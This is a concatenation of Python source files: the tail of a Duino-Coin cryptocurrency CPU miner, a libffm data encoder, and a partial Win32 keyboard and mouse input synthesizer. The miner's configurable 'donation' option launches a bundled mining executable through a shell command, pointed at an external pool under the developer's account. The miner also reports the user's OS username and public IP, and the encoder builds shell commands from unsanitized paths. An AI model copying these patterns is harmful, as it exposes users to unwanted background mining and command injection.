            print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Connected" + Style.RESET_ALL + Fore.YELLOW + " to master Duino-Coin server (v"+str(SERVER_VER)+")")
        else:
            # Server is newer than this miner: let the user opt in to continue.
            now = datetime.datetime.now()
            cont = input(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Miner is outdated (v"+VER+")," + Style.RESET_ALL + Fore.RED + " server is on v"+SERVER_VER+", please download latest version from https://github.com/revoxhere/duino-coin/releases/ or type \'continue\' if you wish to continue anyway.\n")
            if cont != "continue":
                os._exit(1)
    except:
        Connect() # Reconnect if pool down
def Login():
    """Authenticate with the pool, report client info, and print the balance."""
    global autorestart
    while True:
        try:
            try:
                soc.send(bytes("LOGI," + username + "," + password, encoding="utf8")) # Send login data
            except:
                Connect() # Reconnect if pool down
            try:
                resp = soc.recv(1024).decode()
            except:
                Connect() # Reconnect if pool down
            if resp == "OK": # Check wheter login information was correct
                # Report client metadata (miner type, OS user, public IP, platform).
                soc.send(bytes("FROM," + "PC_Miner," + str(pcusername) + "," + str(publicip) + "," + str(platform) + "\n", encoding="utf8")) # Send info to server about client
                time.sleep(0.25)
                now = datetime.datetime.now()
                print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Logged in successfully " + Style.RESET_ALL + Fore.YELLOW + "as " + str(username))
                soc.send(bytes("BALA", encoding="utf8")) # Get and round balance from the server
                balance = round(float(soc.recv(1024).decode()), 6)
                now = datetime.datetime.now()
                print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Style.NORMAL + Fore.YELLOW + " Your account balance is " + Style.RESET_ALL + Style.BRIGHT + Fore.YELLOW + str(balance) + " DUCO")
                break # If it was, continue
            if resp == "NO":
                now = datetime.datetime.now()
                print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Error! Wrong credentials or account doesn't exist!" + Style.RESET_ALL + Fore.RED + "\nIf you don't have an account, register using Wallet!\nExiting in 15 seconds.")
                soc.close()
                time.sleep(15)
                os._exit(1) # If it wasn't, display a message and exit
            else:
                # Unexpected reply: restart the whole process and retry login.
                os.execl(sys.executable, sys.executable, *sys.argv)
        except:
            os.execl(sys.executable, sys.executable, *sys.argv) # Reconnect if pool down
        time.sleep(0.025) # Try again if no response
def Mine(): # Mining section
    """Main loop: request jobs, brute-force DUCO-S1 (SHA-1) solutions, submit them.

    Fix: the "Rejected" line printed the share total as shares[1] + shares[1]
    (rejected doubled) instead of shares[0] + shares[1] like the other branches.
    """
    global last_hash_count, hash_count, khash_count, donationlevel, donatorrunning, efficiency
    if int(donationlevel) > 0:
        now = datetime.datetime.now()
        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
    else:
        now = datetime.datetime.now()
        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://revoxhere.github.io/duino-coin/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
    if not donatorrunning: # Check wheter donation was already started
        # Donation level maps to the -e intensity flag of the bundled Magi miner.
        if int(donationlevel) == 5:
            cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 100 -s 4"
        if int(donationlevel) == 4:
            cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 70 -s 4"
        if int(donationlevel) == 3:
            cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 50 -s 4"
        if int(donationlevel) == 2:
            cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 30 -s 4"
        if int(donationlevel) == 1:
            cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 10 -s 4"
        if int(donationlevel) == 0:
            cmd = "cd " + str(resources)
        try: # Start cmd set above
            process = subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL) # Open command
            donatorrunning = True
        except:
            pass
    # Convert intensity (1-100 %) into a per-job sleep fraction (0.99-0.0 s).
    efficiency = 100 - float(efficiency) # Calulate efficiency
    efficiency = efficiency * 0.01
    now = datetime.datetime.now()
    print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread started" + Style.RESET_ALL + Fore.YELLOW + " using DUCO-S1 algorithm")
    while True:
        time.sleep(float(efficiency)) # Sleep to achieve lower efficiency
        try:
            soc.send(bytes("JOB", encoding="utf8")) # Send job request
        except:
            Connect() # Reconnect if pool down
        while True:
            try:
                job = soc.recv(1024).decode() # Get work from pool
            except:
                os.execl(sys.executable, sys.executable, *sys.argv)
            if job:
                break # If job received, continue to hashing algo
            time.sleep(0.025) # Try again if no response
        try:
            job = job.split(",") # Split received data to job and difficulty
            diff = job[2]
        except:
            os.execl(sys.executable, sys.executable, *sys.argv)
        computestart = datetime.datetime.now()
        # job[0] = base hash, job[1] = expected result, job[2] = difficulty.
        for iJob in range(100 * int(job[2]) + 1): # Calculate hash with difficulty
            ducos1 = hashlib.sha1(str(job[0] + str(iJob)).encode("utf-8")).hexdigest() # Generate hash
            hash_count = hash_count + 1 # Increment hash counter
            if job[1] == ducos1: # If result is even with job, send the result
                try:
                    soc.send(bytes(str(iJob) + "," + str(last_hash_count) + "," + str(st) + "," + str(bytereturn), encoding="utf8")) # Send result of hashing algorithm to pool
                except:
                    Connect() # Reconnect if pool down
                while True:
                    try:
                        feedback = soc.recv(1024).decode() # Get feedback
                    except:
                        Connect() # Reconnect if pool down
                    if feedback == "GOOD": # If result was good
                        now = datetime.datetime.now()
                        computetime = now - computestart # Time from start of hash computing to finding the result
                        computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
                        shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
                        title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
                        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Accepted " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
                        break # Repeat
                    elif feedback == "BLOCK": # If big block was found
                        now = datetime.datetime.now()
                        computetime = now - computestart # Time from start of hash computing to finding the result
                        computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
                        shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
                        title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
                        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Block accepted ("+str(job[0])[:8]+") " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
                        break # Repeat
                    elif feedback == "BAD": # If result was bad
                        now = datetime.datetime.now()
                        computetime = now - computestart # Time from start of hash computing to finding the result
                        computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
                        shares[1] = shares[1] + 1 # Share rejected = increment bad shares counter by 1
                        title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
                        # Fixed: total is accepted + rejected (was shares[1] + shares[1]).
                        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.RED + " Rejected " + Fore.YELLOW + str(shares[1]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.RED + "(boo!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
                        break # Repeat
                    time.sleep(0.025) # Try again if no response
                break # Repeat
def MineRandom():  # Alternate mining method using randomness by MrKris7100
    """Mine DUCO-S1 shares by testing candidate nonces in random order.

    Loops forever: requests a job from the pool socket, hashes shuffled
    nonces until the target digest is matched, submits the result and
    prints the pool's GOOD/BLOCK/BAD feedback.  Also launches the
    optional donation miner once, based on ``donationlevel``.

    Relies on module-level state defined elsewhere in this file:
    ``soc`` (pool socket), ``shares``, ``st``, ``bytereturn``, ``VER``,
    ``resources``, ``Connect()``, ``title()`` and the colorama styles.
    """
    global last_hash_count, hash_count, khash_count, efficiency, donationlevel, donatorrunning

    def _report(accepted, label, mood, mood_color, compute_start, diff):
        # Shared feedback printer for the GOOD / BLOCK / BAD responses;
        # updates the share counters, window title and console line.
        now = datetime.datetime.now()
        elapsed = now - compute_start  # time from start of hashing to result
        ms = str(int(elapsed.microseconds / 1000))  # convert to ms
        if accepted:
            shares[0] = shares[0] + 1  # accepted share counter
            counter = shares[0]
        else:
            shares[1] = shares[1] + 1  # rejected share counter
            counter = shares[1]
        total = shares[0] + shares[1]
        title("Duino-Coin PC Miner (v" + str(VER) + ") - " + str(shares[0]) + "/" + str(total) + " accepted shares")
        # NOTE: the rejected line previously printed shares[1]+shares[1]
        # as the total — fixed to the real accepted+rejected total.
        print(now.strftime(Style.DIM + "%H:%M:%S ")
              + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu "
              + Back.RESET + (Fore.GREEN if accepted else Fore.RED) + label
              + Fore.YELLOW + str(counter) + "/" + str(total)
              + Back.RESET + Style.DIM + " (" + str(round((shares[0] / total * 100), 2)) + "%) "
              + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • "
              + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s "
              + Style.BRIGHT + mood_color + mood
              + Style.DIM + Fore.BLUE + "[" + ms + "ms]")

    if int(donationlevel) > 0:
        now = datetime.datetime.now()
        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
    else:
        now = datetime.datetime.now()
        print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://revoxhere.github.io/duino-coin/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
    if not donatorrunning:  # check whether donation miner was already started
        # donation level -> Magi miner efficiency flag (was 6 copy-pasted ifs)
        fee_by_level = {5: 100, 4: 70, 3: 50, 2: 30, 1: 10}
        level = int(donationlevel)
        if level in fee_by_level:
            cmd = ("cd " + str(resources)
                   + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334"
                   + " -u revox.duinocoin_pcminer -p x -e " + str(fee_by_level[level]) + " -s 4")
        else:
            cmd = "cd " + str(resources)  # level 0 (or unknown): no donation miner
        try:  # start cmd set above; donation is strictly best-effort
            subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL)
            donatorrunning = True
        except Exception:
            pass
    efficiency = (100 - float(efficiency)) * 0.01  # percent -> sleep seconds
    now = datetime.datetime.now()
    print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread started" + Style.RESET_ALL + Fore.YELLOW + " using MrKris' random DUCO-S1 algorithm")
    while True:
        time.sleep(float(efficiency))  # sleep to achieve lower efficiency
        try:
            soc.send(bytes("JOB", encoding="utf8"))  # send job request
        except Exception:
            Connect()  # reconnect if pool down
        while True:
            try:
                job = soc.recv(1024).decode()  # get work from pool
            except Exception:
                Connect()  # reconnect if pool down
            if job:
                break  # job received, continue to hashing algo
            time.sleep(0.025)  # try again if no response
        try:
            job = job.split(",")  # split received data to job and difficulty
            diff = job[2]
        except Exception:
            Connect()  # reconnect if pool down
        # candidate nonces 0..100*diff, visited in random order
        nonces = [*range(100 * int(job[2]) + 1)]
        random.shuffle(nonces)
        computestart = datetime.datetime.now()
        for nonce in nonces:  # calculate hash with difficulty
            ducos1 = hashlib.sha1((job[0] + str(nonce)).encode("utf-8")).hexdigest()
            hash_count = hash_count + 1  # increment hash counter
            if job[1] == ducos1:  # result matches the job target -> submit
                try:
                    soc.send(bytes(str(nonce) + "," + str(last_hash_count) + "," + str(st) + "," + str(bytereturn), encoding="utf8"))
                except Exception:
                    Connect()  # reconnect if pool down
                while True:
                    try:
                        feedback = soc.recv(1024).decode()  # get feedback
                    except Exception:
                        Connect()  # reconnect if pool down
                    if feedback == "GOOD":  # result was good
                        _report(True, " Accepted ", "(yay!!!) ", Fore.YELLOW, computestart, diff)
                        break
                    elif feedback == "BLOCK":  # big block was found
                        _report(True, " Block accepted (" + str(job[0])[:8] + ") ", "(yay!!!) ", Fore.YELLOW, computestart, diff)
                        break
                    elif feedback == "BAD":  # result was bad
                        _report(False, " Rejected ", "(boo!!!) ", Fore.RED, computestart, diff)
                        break
                    time.sleep(0.025)  # try again if no response
                break  # request a fresh job
init(autoreset=True)  # Enable colorama (auto-reset styles after each print)
hashrateCalculator()  # Start hashrate calculator (background thread)
# Main supervisor loop: (re)load config, connect, log in, then mine.
# Fatal setup errors either hard-exit (os._exit) or re-exec the script;
# mining errors fall through and the loop restarts from the top.
while True:
    title("Duino-Coin PC Miner (v"+str(VER)+")")
    try:
        loadConfig()  # Load configfile
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error loading the configfile. Try removing it and re-running configuration. Exiting in 15s." + Style.RESET_ALL)
        time.sleep(15)
        os._exit(1)  # hard exit: daemon threads may otherwise keep the process alive
    try:  # Setup autorestarter
        if float(autorestart) > 0:
            threading.Thread(target=autorestarter).start()
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error in autorestarter. Check configuration file. Exiting in 15s." + Style.RESET_ALL)
        time.sleep(15)
        os._exit(1)
    try:
        Greeting()  # Display greeting message (cosmetic, best-effort)
    except:
        pass
    try:
        Connect()  # Connect to pool
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error connecting to pool. Check your config file. Exiting in 15s." + Style.RESET_ALL)
        time.sleep(15)
        os._exit(1)
    try:
        checkVersion()  # Check version
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error checking version. Restarting." + Style.RESET_ALL)
        os.execl(sys.executable, sys.executable, *sys.argv)  # re-exec self in place
    try:
        Login()  # Login
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error while logging in. Restarting." + Style.RESET_ALL)
        os.execl(sys.executable, sys.executable, *sys.argv)  # re-exec self in place
    try:
        # miningmethod comes from the config file loaded above
        if int(miningmethod) == 2:
            MineRandom()  # Mine using random method
        else:
            Mine()  # Mine using standard method
    except:
        print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + "✗ There was an error while mining. Restarting." + Style.RESET_ALL)
        print(Style.RESET_ALL + Style.RESET_ALL)
    time.sleep(0.025)  # Restart
|
FfmEncoder.py | import hashlib, math, os, subprocess
from multiprocessing import Process
def hashstr(str, nr_bins=1e+6):
    """Map *str* to a stable 1-based bucket in ``[1, nr_bins - 1]``.

    The MD5 digest of the UTF-8 encoded string is interpreted as a big
    integer and folded into ``nr_bins - 1`` buckets, shifted by one so
    bucket 0 is never produced (libffm reserves index 0).
    """
    digest = hashlib.md5(str.encode('utf8')).digest()
    return int.from_bytes(digest, 'big') % (int(nr_bins) - 1) + 1
class FfmEncoder():
    """Convert a labelled dataframe into libffm text format.

    Each output line is ``<label> <field>:<hashed_feature>:1 ...``.
    Conversion is fanned out over *nthread* worker processes, each of
    which writes a temporary shard; the shards are then concatenated
    into the target file and removed.
    """

    def __init__(self, field_names, nthread=1):
        self.field_names = field_names
        self.nthread = nthread

    def gen_feats(self, row):
        """Build 'field-value' feature keys; row[0] is the label."""
        return [name + '-' + str(row[pos])
                for pos, name in enumerate(self.field_names, start=1)]

    def gen_hashed_fm_feats(self, feats):
        """Render (field_index, feature_key) pairs as 'field:hash:1' tokens."""
        return ['%s:%s:1' % (field, hashstr(feat, 1e+6)) for field, feat in feats]

    def convert(self, df, path, i):
        """Write shard *i* (1/nthread of *df*'s rows) to ``path_tmp_i``."""
        per_thread = math.ceil(float(df.shape[0]) / self.nthread)
        shard = df.iloc[i * per_thread: (i + 1) * per_thread]
        with open(path + '_tmp_{0}'.format(i), 'w') as out:
            for row in shard.values:
                indexed = list(enumerate(self.gen_feats(row)))
                tokens = self.gen_hashed_fm_feats(indexed)
                out.write(str(int(row[0])) + ' ' + ' '.join(tokens) + '\n')

    def parallel_convert(self, df, path):
        """Run convert() once per shard in its own process and wait for all."""
        workers = [Process(target=self.convert, args=(df, path, idx))
                   for idx in range(self.nthread)]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

    def delete(self, path):
        """Remove every temporary shard file."""
        for idx in range(self.nthread):
            os.remove(path + '_tmp_{0}'.format(idx))

    def cat(self, path):
        """Concatenate the shard files into *path* via the shell's `cat`."""
        if os.path.exists(path):
            os.remove(path)
        for idx in range(self.nthread):
            joiner = subprocess.Popen(
                'cat {svm}_tmp_{idx} >> {svm}'.format(svm=path, idx=idx),
                shell=True)
            joiner.communicate()

    def transform(self, df, path):
        """Full pipeline: convert in parallel, cat the shards, clean up."""
        print('converting data......')
        self.parallel_convert(df, path)
        print('catting temp data......')
        self.cat(path)
        print('deleting temp data......')
        self.delete(path)
        print('transform done!')
|
keys.py | # Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
# main keys class
class Keys(object):
    """Synthesize keyboard and mouse input via the Win32 ``SendInput`` API.

    Supports DirectInput scan codes (``dk``) and Windows virtual-key
    codes (``vk``).  Key scripts parsed by :meth:`parseKeyString` are
    replayed asynchronously by a :class:`KeysWorker` thread; the
    ``directKey``/``directMouse`` methods send a single event at once.
    """
    common = None          # optional host-application logger object
    standalone = False     # True when no host logger was supplied
    # instance of worker class
    keys_worker = None
    keys_process = None    # replay thread, created lazily
    # key constants (SendInput dwFlags values)
    direct_keys = 0x0008
    virtual_keys = 0x0000
    key_press = 0x0000
    key_release = 0x0002
    # mouse constants (MOUSEEVENTF_* flags)
    mouse_move = 0x0001
    mouse_lb_press = 0x0002
    mouse_lb_release = 0x0004
    mouse_rb_press = 0x0008
    mouse_rb_release = 0x0010
    mouse_mb_press = 0x0020
    mouse_mb_release = 0x0040
    # direct keys (DirectInput scan codes)
    dk = {
        "1": 0x02, "2": 0x03, "3": 0x04, "4": 0x05, "5": 0x06,
        "6": 0x07, "7": 0x08, "8": 0x09, "9": 0x0A, "0": 0x0B,
        "NUMPAD1": 0x4F, "NP1": 0x4F, "NUMPAD2": 0x50, "NP2": 0x50,
        "NUMPAD3": 0x51, "NP3": 0x51, "NUMPAD4": 0x4B, "NP4": 0x4B,
        "NUMPAD5": 0x4C, "NP5": 0x4C, "NUMPAD6": 0x4D, "NP6": 0x4D,
        "NUMPAD7": 0x47, "NP7": 0x47, "NUMPAD8": 0x48, "NP8": 0x48,
        "NUMPAD9": 0x49, "NP9": 0x49, "NUMPAD0": 0x52, "NP0": 0x52,
        "DIVIDE": 0xB5, "NPDV": 0xB5, "MULTIPLY": 0x37, "NPM": 0x37,
        "SUBSTRACT": 0x4A, "NPS": 0x4A, "ADD": 0x4E, "NPA": 0x4E,
        "DECIMAL": 0x53, "NPDC": 0x53, "NUMPADENTER": 0x9C, "NPE": 0x9C,
        "A": 0x1E, "B": 0x30, "C": 0x2E, "D": 0x20, "E": 0x12, "F": 0x21,
        "G": 0x22, "H": 0x23, "I": 0x17, "J": 0x24, "K": 0x25, "L": 0x26,
        "M": 0x32, "N": 0x31, "O": 0x18, "P": 0x19, "Q": 0x10, "R": 0x13,
        "S": 0x1F, "T": 0x14, "U": 0x16, "V": 0x2F, "W": 0x11, "X": 0x2D,
        "Y": 0x15, "Z": 0x2C,
        "F1": 0x3B, "F2": 0x3C, "F3": 0x3D, "F4": 0x3E, "F5": 0x3F,
        "F6": 0x40, "F7": 0x41, "F8": 0x42, "F9": 0x43, "F10": 0x44,
        "F11": 0x57, "F12": 0x58,
        "UP": 0xC8, "LEFT": 0xCB, "RIGHT": 0xCD, "DOWN": 0xD0,
        "ESC": 0x01, "SPACE": 0x39, "SPC": 0x39,
        "RETURN": 0x1C, "ENT": 0x1C, "INSERT": 0xD2, "INS": 0xD2,
        "DELETE": 0xD3, "DEL": 0xD3, "HOME": 0xC7, "END": 0xCF,
        "PRIOR": 0xC9, "PGUP": 0xC9, "NEXT": 0xD1, "PGDN": 0xD1,
        "BACK": 0x0E, "TAB": 0x0F,
        "LCONTROL": 0x1D, "LCTRL": 0x1D, "RCONTROL": 0x9D, "RCTRL": 0x9D,
        "LSHIFT": 0x2A, "LSH": 0x2A, "RSHIFT": 0x36, "RSH": 0x36,
        "LMENU": 0x38, "LALT": 0x38, "RMENU": 0xB8, "RALT": 0xB8,
        "LWIN": 0xDB, "RWIN": 0xDC, "APPS": 0xDD,
        "CAPITAL": 0x3A, "CAPS": 0x3A, "NUMLOCK": 0x45, "NUM": 0x45,
        "SCROLL": 0x46, "SCR": 0x46, "MINUS": 0x0C, "MIN": 0x0C,
        "LBRACKET": 0x1A, "LBR": 0x1A, "RBRACKET": 0x1B, "RBR": 0x1B,
        "SEMICOLON": 0x27, "SEM": 0x27, "APOSTROPHE": 0x28, "APO": 0x28,
        "GRAVE": 0x29, "GRA": 0x29, "BACKSLASH": 0x2B, "BSL": 0x2B,
        "COMMA": 0x33, "COM": 0x33, "PERIOD": 0x34, "PER": 0x34,
        "SLASH": 0x35, "SLA": 0x35,
    }
    # virtual keys (Windows VK_* codes)
    vk = {
        "1": 0x31, "2": 0x32, "3": 0x33, "4": 0x34, "5": 0x35,
        "6": 0x36, "7": 0x37, "8": 0x38, "9": 0x39, "0": 0x30,
        "NUMPAD1": 0x61, "NP1": 0x61, "NUMPAD2": 0x62, "NP2": 0x62,
        "NUMPAD3": 0x63, "NP3": 0x63, "NUMPAD4": 0x64, "NP4": 0x64,
        "NUMPAD5": 0x65, "NP5": 0x65, "NUMPAD6": 0x66, "NP6": 0x66,
        "NUMPAD7": 0x67, "NP7": 0x67, "NUMPAD8": 0x68, "NP8": 0x68,
        "NUMPAD9": 0x69, "NP9": 0x69, "NUMPAD0": 0x60, "NP0": 0x60,
        "DIVIDE": 0x6F, "NPDV": 0x6F, "MULTIPLY": 0x6A, "NPM": 0x6A,
        "SUBSTRACT": 0x6D, "NPS": 0x6D, "ADD": 0x6B, "NPA": 0x6B,
        "DECIMAL": 0x6E, "NPDC": 0x6E, "NUMPADENTER": 0x0D, "NPE": 0x0D,
        "A": 0x41, "B": 0x42, "C": 0x43, "D": 0x44, "E": 0x45, "F": 0x46,
        "G": 0x47, "H": 0x48, "I": 0x49, "J": 0x4A, "K": 0x4B, "L": 0x4C,
        "M": 0x4D, "N": 0x4E, "O": 0x4F, "P": 0x50, "Q": 0x51, "R": 0x52,
        "S": 0x53, "T": 0x54, "U": 0x55, "V": 0x56, "W": 0x57, "X": 0x58,
        "Y": 0x59, "Z": 0x5A,
        "F1": 0x70, "F2": 0x71, "F3": 0x72, "F4": 0x73, "F5": 0x74,
        "F6": 0x75, "F7": 0x76, "F8": 0x77, "F9": 0x78, "F10": 0x79,
        "F11": 0x7A, "F12": 0x7B,
        "UP": 0x26, "LEFT": 0x25, "RIGHT": 0x27, "DOWN": 0x28,
        "ESC": 0x1B, "SPACE": 0x20, "SPC": 0x20,
        "RETURN": 0x0D, "ENT": 0x0D, "INSERT": 0x2D, "INS": 0x2D,
        "DELETE": 0x2E, "DEL": 0x2E, "HOME": 0x24, "END": 0x23,
        "PRIOR": 0x21, "PGUP": 0x21, "NEXT": 0x22, "PGDN": 0x22,
        "BACK": 0x08, "TAB": 0x09,
        "LCONTROL": 0xA2, "LCTRL": 0xA2, "RCONTROL": 0xA3, "RCTRL": 0xA3,
        "LSHIFT": 0xA0, "LSH": 0xA0, "RSHIFT": 0xA1, "RSH": 0xA1,
        "LMENU": 0xA4, "LALT": 0xA4, "RMENU": 0xA5, "RALT": 0xA5,
        "LWIN": 0x5B, "RWIN": 0x5C, "APPS": 0x5D,
        "CAPITAL": 0x14, "CAPS": 0x14, "NUMLOCK": 0x90, "NUM": 0x90,
        "SCROLL": 0x91, "SCR": 0x91, "MINUS": 0xBD, "MIN": 0xBD,
        "LBRACKET": 0xDB, "LBR": 0xDB, "RBRACKET": 0xDD, "RBR": 0xDD,
        "SEMICOLON": 0xBA, "SEM": 0xBA, "APOSTROPHE": 0xDE, "APO": 0xDE,
        "GRAVE": 0xC0, "GRA": 0xC0, "BACKSLASH": 0xDC, "BSL": 0xDC,
        "COMMA": 0xBC, "COM": 0xBC, "PERIOD": 0xBE, "PER": 0xBE,
        "SLASH": 0xBF, "SLA": 0xBF,
    }

    # setup object
    def __init__(self, common = None):
        """Create the worker; *common* is an optional host-app logger."""
        self.keys_worker = KeysWorker(self)
        # Thread(target=self.keys_worker.processQueue).start()
        self.common = common
        if common is None:
            self.standalone = True

    # parses keys string and adds keys to the queue
    def parseKeyString(self, string):
        """Parse a comma-separated key script and queue it for replay.

        Tokens: ``VK``/``DK`` switch the code table, ``0x..`` is a raw
        key code (1-255), ``-N`` pauses for N milliseconds (max 10s),
        anything else is a key name with an optional ``_UP``/``_DOWN``
        suffix (no suffix = press and release).

        Returns ``True`` on success, or the list of unparseable tokens
        — in which case nothing is queued.
        """
        # print keys
        if not self.standalone:
            self.common.info("Processing keys: %s" % string)
        key_queue = []
        errors = []
        # defaults to direct keys
        key_type = self.direct_keys
        # split by comma (the whole script is upper-cased first)
        keys = string.upper().split(",")
        # translate
        for key in keys:
            # up, down or stroke?
            up = True
            down = True
            direction = key.split("_")
            subkey = direction[0]
            if len(direction) >= 2:
                if direction[1] == 'UP':
                    down = False
                else:
                    up = False
            # switch to virtual keys
            if subkey == "VK":
                key_type = self.virtual_keys
            # switch to direct keys
            elif subkey == "DK":
                key_type = self.direct_keys
            # raw key code.  BUGFIX: the input was upper-cased above, so
            # hex tokens arrive as "0X.." and never matched "0x" before.
            elif subkey.startswith(("0X", "0x")):
                subkey = int(subkey, 16)
                if subkey > 0 and subkey < 256:
                    key_queue.append({
                        "key": int(subkey),
                        "okey": subkey,
                        "time": 0,
                        "up": up,
                        "down": down,
                        "type": key_type,
                    })
                else:
                    errors.append(key)
            # pause (milliseconds -> seconds; renamed local so it no
            # longer shadows the imported time())
            elif subkey.startswith("-"):
                pause = float(subkey.replace("-", "")) / 1000
                if pause > 0 and pause <= 10:
                    key_queue.append({
                        "key": None,
                        "okey": "",
                        "time": pause,
                        "up": False,
                        "down": False,
                        "type": None,
                    })
                else:
                    errors.append(key)
            # direct key
            elif key_type == self.direct_keys and subkey in self.dk:
                key_queue.append({
                    "key": self.dk[subkey],
                    "okey": subkey,
                    "time": 0,
                    "up": up,
                    "down": down,
                    "type": key_type,
                })
            # virtual key
            elif key_type == self.virtual_keys and subkey in self.vk:
                key_queue.append({
                    "key": self.vk[subkey],
                    "okey": subkey,
                    "time": 0,
                    "up": up,
                    "down": down,
                    "type": key_type,
                })
            # no match?
            else:
                errors.append(key)
        # if there are errors, do not process keys
        if len(errors):
            return errors
        # create new thread if there is no active one
        # (Thread.isAlive() was removed in Python 3.9 -> is_alive())
        if self.keys_process is None or not self.keys_process.is_alive():
